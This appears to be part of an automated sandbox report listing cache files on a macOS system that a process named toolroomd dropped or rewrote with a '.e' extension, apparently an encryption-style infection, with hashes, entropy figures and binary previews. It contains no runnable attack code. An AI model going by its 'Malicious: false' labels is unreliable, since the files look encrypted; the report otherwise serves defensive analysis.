SSDEEP:	768:GDO7subKweMmjSPKTL52Z4PTpR1i2+rxSb2MiFxOTpJItNdPemH2WiKctXxMO9h8:GGFOwbPB2CtSJbCz5fsN/VUVCyjJO1a
MD5:	BBFB5C5F8674B754B6BCF233E193D82F
SHA1:	0BCC048D5DA4254C7A196FD6F5D443A228D553A8
SHA-256:	027A19A0AA8D83538F232632829C91918AA94E594FDA8F149D935F1B1FE113AB
SHA-512:	580737E6EFA1B4F885E636CB0F08375911FABB3C3B81EB956ABDFD26F88722C52B619D348409B60C019C5BAA4806A042BA553C3DD50414B869AF827786CDE152
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.....=.SC....g.u....yvWJ..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{.....eu%........?.f.6........e.9.....\|-H..h...#.....v..O......+...V..j....eD.q)..r.d..-..OZ.)#n..H>_.z....dh...<..!.;*...D..OY.i.c..9....D.g".R..;[..7.j..P.....^..p...r%...2...uc....+.m.4....kc.#A.\|tO..8{.......,.....c.;..4.....^...2..^...@`...#...`....r.~R.6..M..2...x.C.R6lh_.zr.....E..4.....N...b../.>...m#.y....>s.{...u..N4..Z.U~.76F.J..S....^.!...Hc'<./.a./.....2..A.@!,....{..........M.A...7..A.}L_.(Cn.s.3....E....._......v..O.....q...14T@.^...2.......@...].].{.!...r.~R.6..M..2...x.C.R.2...f...-.... .....N..S?...]...m#.y....>s.{...u..N4.3..b.I..Tt[.....0.g..Q.....~-./.a./.....2..A.@!,....{.;%-s...y.~..!..e[.C...xt..B..O.m.D..4p.4{..p..,9.n..Dr..M..{.....eu%.O..4\X.........B....g.u...0..g..X..@Y.......v..O.....aw.N4....z...!...x$).-s.kc.#A.\|tO..8{.......,.....c.;.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.E351B077-0A32-46E6-9DD0-6B57346F7779.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	65357
Entropy (8bit):	7.705025799922651
Encrypted:	false
SSDEEP:	1536:GNg+V2ORXSUj5AJXKzySOEwImz3G8N5EDXcVW1sie71SVm02bWNPu:GNYORCW5iKz/vY3N5EDXcVW1siex4mnx
MD5:	2E699D7BB35909022A0B0CBEB042BB59
SHA1:	D98CB0DCDF9457EB9E999065D955B010518E7D85
SHA-256:	62C6CEB3EBE772A0CB869D0E5E932491B5A3D2A85F02AB7A9BE56F82BA0FBD2B
SHA-512:	05183BC7BDC1A28A6DCA0B385D01D0F318E23BF3C8DF8E64511EB701F44B10829CECA01F9C372FB1D50B2AFA6004E0F711FF43B4A529D4E85422AA47709D5220
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.~L....>..P.>.......&....O..(.6I...>.F.=.u..['2..SHIPC. ...p.....v..O.....?;6.$.6./e.Q.a;._..* }...Y../.a./.....2..A.@!,....{.....q.qi...0./..R."..D\|X..ol.%...1..<{..p..,9.n..Dr..M..{......3.._m.Zb-.8..IL.M.i..M.]t..?Ewk........-<..z....dh...<..!....d.... 2.....v.I.#`%..t _.....\|-H.C. ...p.....v..O......$._\...e....E..xD.!-2$.......D{..p..,9y...<..<..M..{......3.._....=.....I..m.Y....q..,;.v.w..s....G.z....dh...<..!....d..7M.+.....n....y\|.FP)pGg."....1..M.3z.W.....v..O......$._\....y..0.q....>..JU..t..........P.z....dh...<..!....d....4.O.......I........{...V.:.....h...#.....v..O.......E6.'.....K...B..l=..."I.=/.kc.#A.\|t.....S!......,.....c.;.U.s..(t..x&.o.....>[_.I.O..bC.]...C.l...2..A.@!,....{.....q.qi...)..&..h.!.I....>..JU..U!o..z.....P.z....dh...<..!....d...E.........I..nR.W(]..p..(Y.....h...#.....v..O......>:G.zJT

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.E3F027A4-D826-414D-B174-946B6B3A17EF.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	72926
Entropy (8bit):	7.849915320566151
Encrypted:	false
SSDEEP:	1536:GjfJVYSWV1yiWWG0PL6pMn4XWB2HPcmCy5U/0Ab0HA8zfL3:GPYSBdT0PL6GneWUPcmnW/0o0g8P
MD5:	0FB6286F0EC98677ABC5DAF294ED5058
SHA1:	5FBD7C2FCB3CB6224C8FB4CADE9168C4E738C65E
SHA-256:	57EA163C1CDD27F9DD2AD402BD39B8C29FFCD97AFCAB95EBCB498900F472BEDD
SHA-512:	2212C727BAE579412576832C4194F88DDCE7409DDCE2D221F6C27A7CA54091D3B6B3283E5139214507A8637FE848A134ADE9B0AAF436CA353DC8C087EC58E971
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:...N..EB..N..Nr..6.n....J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.wai....w@.........E.....e...;j...F.%._..>s.{...u..N4[. .6...W...H....2XQ.w^Qx..Y.@.)#n..H>_.z....dh...<..!....u.....W..>...!...P.. d(.....m,;..W.6..M..2...x.C.R.eY.....5...Ryaz}.X..}.o.`=.....B..z.R.6..M..2...x.C.R..~.v>..s"mxL....8..i...k.u=6/.a./.....2..A.@!,....{......q."...N.Q.K.ze)~J...e....._..oqx.......u..P.....^..p...r%..8...u../.M.....$x..N..$.4EV.B..X..@Y.......v....R.(...i..u.Z.Rc.........f.I..I...J%....:..+.....v..O.....d../.@...LG.....\O...x...N-o.....X..@Y.......v..O.......r5`%Q.E.V....W..zLi..N-o.......:..+.....v..O.....S;...`\......d.[....R.k.Q.X.*..1..\|.b.P.....^..p...r%...jl..a7L.. ....e....._&.....T....u..P.....^..p...r%..8...u...'..n.H....yO.0.5.?.N....ilBI..>s.{...u..N4[. .6..........\c....+.m.0H.R.L.kc.#A.\|tO..8{.......,.....c.;..0H.R.L.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.EB21A37F-4B57-49E7-AF7F-9BE61235F8C7.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	31435
Entropy (8bit):	7.966718010753139
Encrypted:	false
SSDEEP:	768:UaA1HKCPcQ0OzKJlV9iYTNX8LsqS/t/2UZU7ze3F/mNzQ30bJtYNphdH8Ub:glXPcPOzGTEYTNXR1eUD3F/qzQyQ/Um
MD5:	04E4A80B9865C94680DACAD3D7233D87
SHA1:	4DA490EE2691004C49B2267D67E3EB2FE1F687B9
SHA-256:	3510E429E6BFCAFE91D2EEB3FB3722A466CD0D8641DCA8C011833908F5CB3BE3
SHA-512:	643C0DD22EEB8C8AA426CAFB30D19BD3C6A3156E8D3578B6AEA1257D5EF0BCEF140A2F9698F3DC905CA53CC2BB124BA48E8D0514B41012C9D3AA5659A7B11450
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W.2K.F..T.H'.N...`...\...kXSI....M.?........!......m.....M.%&..EIB..`.9.~J...wU........G.oU.\D...j..{.....xn...d..\.F.2..[...o..Hm'.lt.8.gsZ.g...>.<./o2F...q...P..E!....6.W..=.bz.i..#4&.h...@..A...\|...%...M...D..............w...G.K_...)QW.....5....v2.p.w......Y...Tn....a.g.......j..4.OS.k.f....?M.V....\$W...u...t...[w^/..O.W.1..6.36R.sv...V.m...L.....[.YoJ.i..d...R.jW....!..].g.p.}.M.ZY..d+.Q+.E..<.l..w.e..oT..\|.<........m.lo.e.5..i.\|..Z&.Q.."...S..;..l....@.j.4..?.4>.$-u'pQ...\|......JOn..I..j..........r...._....._.Mb...wY.k..Q.w.Z0..s....F.2..[..P$..Q....@....o.9.n...AD6..`..BFk.es......+M..0%...Q.a.ws....#......h.it..V..dN.....0=T..}.8.........Cn.........A_.G..Q....../....Dp.....j=..\[.....$.-.....~'.=Q....=..eT.z.Z.........5H../..I.?....nw..(".o.nfe......Md.^...H...........o.........(.....r..s....Q.C...DC}.v.x.%.tak.o.d....H.....>..G..._t..E..`).yW....dc`N7.Cc.!._;>..Vt....J)a...9..d.Q.x8$.u.Q!G}.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.EDDD99F3-FF68-44BC-95F1-4FC7DA8ED405.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	81566
Entropy (8bit):	7.764585349163345
Encrypted:	false
SSDEEP:	1536:GlT9R0ZDkqHjnPk0tlgCeMahlfSdQpT9RgrD9xzZj:GWDvA0nQ7qdGT9yD9Jl
MD5:	826062600ADB68861999E74C4E6B951F
SHA1:	CDA4A99124A0CC149AD5F3AF4A52041FE8F32F43
SHA-256:	837E8A3DEB298DA6770184D79E695D22F6DE9F857ED57AC5031A8F8F4D2839E7
SHA-512:	B452A5CC064062797C359C613B4F097BED2245A208DD8E084ADD904356594A7D6784C3CE0B9914FE53C49E524DA4BC05D83491AF295BC530CABA8DD3C81F3FF9
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..}'."1\.#jJ.1...R...g..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{....Z....-......M....F$..G..F.%._..>s.{...u..N4Xo....j.E.e..a.....5....P..0KK{..p..,9r........M..{........n..>.......@~.o....&3..8f;H...2..........,.....c.;..u,...Y.\|.srG.`L...k3..kc.#A.\|tO..8{.......,.....c.;.L...k3......@~..)ZX.mfZkc.#A.\|t.2..........,.....c.;.jV....>~<-?......^.Y.0-~."....1...:..+.....v..O.......ium.....\."...U....rF .4.0.1..\|.b.P.....^..p...r%...e4X...^..[.2D .:.juv..dY3#.......u..P.....^..p...r%...E.a...Q.$V`.G.!.$w...."....1.X..@Y.......v..O.....Dp.....O..$...=.=.ZGb.3....E....:..+.....v..O.....0..E..#....%..S.)p..v.5..MEo}>....ilBI..>s.{...u..N4Xo....j..w"...M.<-?..........(...0..g....:..+.....v..O........i.q`..L..oK.o.Q.8...n{.Mj.1..\|.b.P.....^..p...r%..\c.W.}Vb]..>0.#.8]K...nt...^...{..p..,9.n..Dr..M..{....Z.1.....

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.F6BB0A9E-07B2-4DF7-BBBA-0182A2DD7079.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	56773
Entropy (8bit):	7.497908780565534
Encrypted:	false
SSDEEP:	768:GobeTwKTLdvR8vSU1x86u2ruMQ2m8Zd/BhhIeqOs+0q2hapgy5TwqB9Q0+KX2yUv:GUeTfP785jgKtlfT1QWtGzzuWTffBL
MD5:	E9AE70FC65AD1252B0C3A5C3CD1DEACB
SHA1:	2D06C6D8B8835944ABFE19E3E148969B66238052
SHA-256:	EF081F85E6D34B9C09AA04C3D7083751E674D454A87E41E1184B139BC7BB34FF
SHA-512:	07C9D2C57FB012385B768EA295A919B9F16BD072C3B335C263BA24A6E78BE170675FF2EA5769208BA0C9DA92DD0FA0AE0E9F3B72F41EFB35C9FF69A900218809
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.T.bt....".U-../Xi..Amv..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{...x..{......2.e.u.kI..}.oc....!.N-o.......h...#.....v..O......A..8b...+..AQ(..\.&K..U.c.NO.kc.#A.\|t.....S!......,.....c.;.9Y. .b.s....M).....y..d.t\.A..r..{..kH..>s.{...u..N4....B.........e...Z...S....,{..p..,9P...Z...M..{...x..{....{.-.n.....1.).o.B&u...F.%._..>s.{...u..N4X#;.[N...8.0...<...Z4./..;..6.)#n..H>_.z....dh...<..!..Mn7@..~.....3..h.@I4.Cj.z...\...m,;..W.6..M..2.....c....H.....%.......ic.-..U.sy..y..{..p..,9.n..Dr..M..{....IK..N7..;..A..~/......l...=.,T>.!...5.RK..6..M..2...x.C.RC........._...9.AIZ.r.....-8.F.}kc.#A.\|t.....S!......,.....c.;.*o...f.YWp.......\|8-..h.i..}..n/.a./.....2..A.@!,....{.;%-s...yT.......b;..y....w...w...Z'..3....u..P.....^..p...r%.....h.7.^....O..v.E..7.....%....ilBI..>s.{...u..N4.....JMH3}>.6....j.f.vV@.D8...&....bx..n..0.....

/Users/berri/Library/Caches/com.apple.keyboardservicesd/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.3729818661522675
Encrypted:	false
SSDEEP:	24:ZLtsIs+0HhQou000000000000000N000000000000000000000000000000N000L:ZLWNRNpq
MD5:	BF7081D97BF2D254AE48D5AE8B286431
SHA1:	C3E8D01741A9F515F0B816456D78B6D864DE913D
SHA-256:	7B8D09BE16107FB4300586893E0C7FD80DD89E33E670719127B797527585933D
SHA-512:	1BFA799ABE50D72FCF9D68EF0AF45016A98610126218DA4023CF292B02C1B64A78950DF1EFFCDD113626226998C8033BB6945FDAF31425575BDD23D03FBB6336
Malicious:	false
Preview:	f...#D..K^....P.f.+0Tw.O.....{.2.Z......=Q..f...#D..K^....P.f.+0Tw.O0.cf.7V..2.Z......=Q..6<.."a.....P.W.B...q.A"&6<.."a..6<.."a..<..Yv.m...-...3o1..!......n............'.IT1..vq;`y.'o1..!...6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.keyboardservicesd/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	66302
Entropy (8bit):	4.537912775282729
Encrypted:	false
SSDEEP:	384:PpzQfCU5g8U9iBQfqUwbJ5UloUtKNiKUi:PFQfCU5DUwQfqUyUloUtUUi
MD5:	A8F226FADCBA286F33E361D24FD98B86
SHA1:	5436DF72ACC38762A75AAA851A59440F9A934603
SHA-256:	C376A336605A14116F12ED077BB33C4A28A70912B7048353D051174821F06207
SHA-512:	28ECBC2AA09AB4027FDA1153C8A56C1344C5F35C35EB43F7BADF8B6D376CAE32C59A0CDE4DAC57120BB055C257FCBEC63B47E50CA428080FDD4244CA7FD8AEA8
Malicious:	false
Preview:	^u..o.F.47.W&.z..2.Z........"1.C.D...+.2.Z..5..##...S.T.....R....e.t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.keyboardservicesd/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	3.601616927263299
Encrypted:	false
SSDEEP:	48:76HBY3OO/2sbj028GRp/oLP+501K2TxD4XRB2/OGNpq:8RujDL/oLGm11B4hBiOGu
MD5:	9DCDB17D6D5E32EB45B2F68064F1209C
SHA1:	0864BAF74F3428747441E12493858EEBD5C7F2AA
SHA-256:	96AEEC3C8337387EC8B23E0DAD1701906FD39F211DD94D178B9AE7B806E96504
SHA-512:	41811E38E1CD488C3F9957A47CFFCE3921D924F9CCDA9623C30580764BE078B9B818D16617E44F944E97CBF573DB79C1D249156A75FEFB0CC96EFF9C8F8F8076
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.parsecd/.spotlight_stopword.map.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	149163
Entropy (8bit):	7.939066018896463
Encrypted:	false
SSDEEP:	3072:WpWW9nj4AoUlYGTSUyT/JWiGcy4TdEF8kIvVelnYt6UPjAgN5WVNBVcf:W0kH2mSUQ/gDc7dEF8FVelYt68AgbGcf
MD5:	94143522AE992F7BCB08B914E697E202
SHA1:	F9050927EFDC91295ED3FCB48AF68ED35D233CB4
SHA-256:	4181FE4BFF52D65B07F0DEE6E5963F33A35D8952CD9AD420C4BE946B245187E2
SHA-512:	4B1F1EB1FB0424CC90B4E0D36AC234810C36A86ABB1C3DCB3D332B9160AB2FBF29F586103676329565FFCD735175C09CD964614EE5A5D1EB3D32CEAEBF2F1FFF
Malicious:	false
Preview:	...)vu.O.{...$O..zsm./.}.#..A.........3. r....W6<.."a..!.f.5...A. .../>m.... ._6<.."a..r.E"g.>...ed=...........qJ..>...A.P.1.e..\o..._.6<.."a..6<.."a..6<.."a..<.......6<.."a...E.l.V........,n.KQ.)E....q..:..4t.B...f..O...\|....9...F.XV..%6<.."a.....F-.>/.a.z.o...L... ](..#48ua.0..k...fH...6<.."a...;....N......6<.."a..t....Sq6<.."a...2.f..VGb)...6.6<.."a..6<.."a...@.r956<.."a..6<.."a..3U.....z....&.{#&...ME~?.J..Z.[....o.:.46<.."a..6<.."a......1.w..4....0f.Z....r;..Pr.\. ..x;X+j.4.g0!%sb...,$...\U.....\|}./....w.s..h.+.=f..?6<.."a..v:s.....$.....i_.Da...7R.*0...U.N'.._.X.2...]6<.."a...v.B.a>E&[....HXz..BG....;..(.f+\|.(z..@.n..b.]lb$:......tSRl...6<.."a..6<.."a..M...8.#...@..U#.p..~.......QR......Rh..,.{.k?X.x.\|.6<.."a..6<.."a....../.t.6<.."a......]z...X...n....E.p...)W.:(uHP_n..6<.."a..}l...n..R..7..H${H"j.I{4_2..Q1G....ZkP86<.."a.....%(s.6<.."a..D..y..Y\|6<.."a..6<.."a..d.....]........H.Z...i.Y.CgU3....r...1q6<.."a..6<.."a.......V.Q%c...9q...Y.Y...4f![.d

/Users/berri/Library/Caches/com.microsoft.OneDriveStandaloneUpdater/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.311007485153375
Encrypted:	false
SSDEEP:	24:Wa00RVaNgwQ0000000000000000000000000N00000000000000000000000000/:t7NHNpq
MD5:	2E8271BF8F55C068ACDF363AC9AF4874
SHA1:	293A5F246B5CA66204CB8D3B601A6DC768550146
SHA-256:	033E228ECBAB1C6848EF974889A2EE3A9697BBB986D31E52745EE3CF3CE242A7
SHA-512:	962ABDA0597A71F6BFE9B78ECE231EA34A26F68ACD9FEB161797362030FA5C15EFF5703946F529C56E769C7CDBAB83D7DB21A51D3BDC41D7ACF71D5C728837CF
Malicious:	false
Preview:	f...#D...z.Ydf].6<.."a..6<.."a..6<.."a........&f...#D...z.Ydf].6<.."a..t....Sq6<.."a........&6<.."a.....q.A"&...q.A"&6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.microsoft.OneDriveStandaloneUpdater/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/com.microsoft.OneDriveStandaloneUpdater/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	4.078140769661791
Encrypted:	false
SSDEEP:	96:8RujDL/oLGm11B4hBPvJlHQOFu7GnYuj6Pw5pqN1J3IxbWemu:PLoCy1ihBPv3u7M6o5Y1J2
MD5:	1F481B8E55B54722D1BBD9D95E043F0B
SHA1:	E4CE722EC0A3D150553581873A27C015914BF434
SHA-256:	C0694E64EEAD6FF57D0262A37A11B2C95A5664DC754BF00218B7D08D033713C8
SHA-512:	217FE59D126477864416C96B63893B073E738470A893CF13C87679D6A280BC21F06EB3DFB8BA9D84C9FC1B5BA34A02D26DC508DEE408A4D293AAE2443305197D
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.microsoft.autoupdate.fba/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.3501972460195866
Encrypted:	false
SSDEEP:	24:sDfdDqmdou00000000000000000000N000000000000000000000000000000N0V:sDFDK1TduNpq
MD5:	E3B5602AC7B6E33CE8AE8F3D0722FC38
SHA1:	E1E4F95FA9233B31CED229D0BBF8105EB84C757D
SHA-256:	4621E4F708E9D6EE2601434A8D8A2D62BD1E1BFC36C9A8E49262018E6AE17FD7
SHA-512:	1674E1F1C72D2ABF46DD02FE075681F3008B233C80C7CA23C90CA8B21C83E8D7B19A232458D3AF822C7CA13492DEABD5875DC9D5AAE7E5B2F5BEF9EF110E4EC4
Malicious:	false
Preview:	f...#D....eLd.Xf.Q.....=.wX....W...\|...8.....f...#D....eLd.Xf.Q...L.K5.&%..W...\|...8......PZ..9....}s~.....q.A"&6<.."a..PZ..9...'.IT1..vq;`y.'o1..!...6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.microsoft.autoupdate.fba/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
